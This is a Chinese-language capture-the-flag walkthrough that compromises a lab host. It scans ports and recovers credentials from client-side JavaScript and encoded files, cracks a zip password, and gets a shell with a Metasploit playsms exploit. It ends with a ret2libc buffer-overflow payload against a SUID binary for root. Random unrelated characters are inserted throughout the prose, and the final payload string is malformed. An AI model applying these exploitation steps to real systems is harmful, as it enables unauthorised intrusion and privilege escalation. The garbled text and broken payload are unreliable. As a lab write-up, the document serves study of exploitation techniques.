這是一道PWN題,知識點在于Ret2LibC攻擊滤灯,兩篇不錯的參考文檔:
http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/Return_to_libc/Return_to_libc.pdf
https://www.exploit-db.com/docs/english/28553-linux-classic-return-to-libc-&-return-to-libc-chaining-tutorial.pdf
1.在端口掃描上吃了小虧巍杈,看到139忧饭、445開放后就中斷了掃描,結果搞了半天samba沒有進展筷畦,重啟掃描后才發(fā)現了9999端口词裤,而滲透的起始點正是這個端口。
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
1880/tcp open http Node.js (Express middleware)
9999/tcp open http nginx 1.10.3 (Ubuntu)
2.通過瀏覽器訪問鳖宾,可以看到一個默認的nginx歡迎頁面吼砂,很顯然需要目錄爆破了,利用dirbuster可以發(fā)現admin鼎文,test渔肩,dev,backup拇惋,loop和playsms目錄周偎。其中admin目錄需要密碼抹剩,backup頁面提供了一組用戶名密碼,playsms是知名網站框架蓉坎,同樣需要用戶名密碼澳眷,下面一個目錄一個目錄尋找線索。先記錄backup頁面得到的賬戶:
user - admin
password - imnothuman
3.在admin頁面開始嘗試破解登錄密碼蛉艾,F12進入開發(fā)者模式后能發(fā)現一個詭異的現象钳踊,當填寫好用戶名密碼并點擊Login按鈕后,頁面沒有發(fā)出任何的Post或Get報文勿侯,直接提示密碼錯拓瞪,還剩兩次機會。這說明用戶憑據的校驗是在前臺完成的助琐。
查看網頁源碼祭埂,發(fā)現加載了login.js,在這段腳本里可以直接拿到明文密碼
4.登錄后會拿到一段惱人的編碼文件弓柱,這是0ok編碼沟堡,利用這個網站可以直接翻譯原文:
Nothing here check /asdiSIAJJ0QWE9JAS
進入/asdiSIAJJ0QWE9JAS目錄,獲得另一端編碼矢空,這回看起來像是base64航罗。拷貝這段編碼屁药,利用echo "編碼串" | base64 -d > decodefile將解碼后的結果寫入文件粥血,發(fā)現這是一個zip壓縮包。
5.打開這個壓縮包需要輸入密碼酿箭,利用fcrackzip對密碼進行爆破复亏,很快能拿到結果,密碼就是password缭嫡。
fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt decodefile
6.壓縮包里保存了一個.php文件缔御,查看后發(fā)現這是一串Hex編碼,可以利用http://www.unit-conversion.info/texttools/hexadecimal/將它進行轉碼妇蛀,轉碼后是另一串base64耕突。
同樣利用https://www.splitbrain.org/_static/ook/拿到明文:idkwhatispass
7.賬戶admin:idkwhatispass能夠登錄http://10.10.10.111:9999/playsms。針對知名網站框架的攻擊评架,可以依賴漏洞眷茁。在msf平臺中,利于模塊 exploit/multi/http/playsms_uploadcsv_exec可以輕松的拿下shell纵诞,uset.txt就位于/home/ayush目錄下上祈。
8.現在面臨的是權限提升問題。檢查SUID文件,發(fā)現可疑程序/home/ayush/.binary/rop被設置了S位登刺。
find / -user root -perm -4000 -exec ls -ldb {} ; > /tmp/ckprm
9.運行程序發(fā)現rop要求用戶輸入一段Message籽腕,這很可能是一道溢出題,通過溢出拿到root shell塘砸。要在目標上順利執(zhí)行溢出节仿,需要關注以下問題:
*系統的地址隨機化是否開啟晤锥?0代表關閉 sysctl -a --pattern "randomize"
*添加環(huán)境變量SHELL='/bin/sh' 掉蔬,有的不存在,有的是bash矾瘾,而bash會默認取消繼承的root特權
對于本題來說女轿,地址隨機關閉,需要利用export SHELL='/bin/sh'添加環(huán)境變量壕翩。
10.攻擊思路是蛉迹,因為目前的系統和處理器都有數據執(zhí)行保護,堆棧上不允許運行程序放妈,所以shell code只能從已經的代碼中拼湊北救。若想利用system('/bin/sh')彈出shell,則需要找到system的函數地址和/bin/sh字符串的位置芜抒。函數system可以在libc中搜索這是每個程序都會引用的庫文件珍策,/bin/sh字符串因為我們手動輸入所以一定存在于環(huán)境變量的內存中,那么我們還要做的就是定位溢出點宅倒,將system地址和參數入站攘宙。
11.在libc中搜索系統函數可以利用以下腳本:
https://0xdeadbeef.info/code/libc-search.c
gcc無法在目標上直接運行,需要在kali編譯后上傳拐迁,注意kali是64位系統蹭劈,目標是32位系統,編譯指令如下:
apt-get update
apt-get install gcc-multilib g++-multilib
(可能錯誤:In file included from location.c:1:/usr/include/stdio.h:27:10: fatal error: bits/libc-header-start.h: 沒有那個文件或目錄)
gcc libc-search.c -o libc-search -lc -ldl -m32
運行結果如下:
system 0xb7e53da0
exit 0xb7e479d0 //非必需保證函數正常退出
/bin/sh 沒有找到
我們還需要用簡單的代碼自己搜索"/bin/sh"的位置线召,運行結果位于地址bfffffe0處铺韧,這是SHELL的位置,/bin/sh應該還要退后6位缓淹。
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main()
{
char* shell = getenv("SHELL");
printf("%x\n", (unsigned int)shell);
}
12.利用腳本生成隨機串哈打,提交rop運行并定位溢出點,參考:
https://www.offensive-security.com/metasploit-unleashed/writing-an-exploit/
隨機串生成:/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
步驟如下:
*利用pattern_create.rb生成隨機字符串
*gdb跟蹤調試
利用pattern_offset.rb定位溢出點
13.構造POC割卖,目前已經獲得準確的溢出偏移前酿,System函數地址,Exit函數地址以及"/bin/sh"字符串位置鹏溯,接下來要做的就是將他們組合起來罢维,利用溢出點把它們壓入棧中:
POC:52位字符串 + System函數地址 + Exit函數地址 + "/bin/sh"字符串地址
POC: `python -c 'print "A"52 + "\x0a\x3d\xe5\b7" + "\x0d\x79\xe4\b7" + "\xe6\xff\xff\xbf" (注意地址的小端點格式)
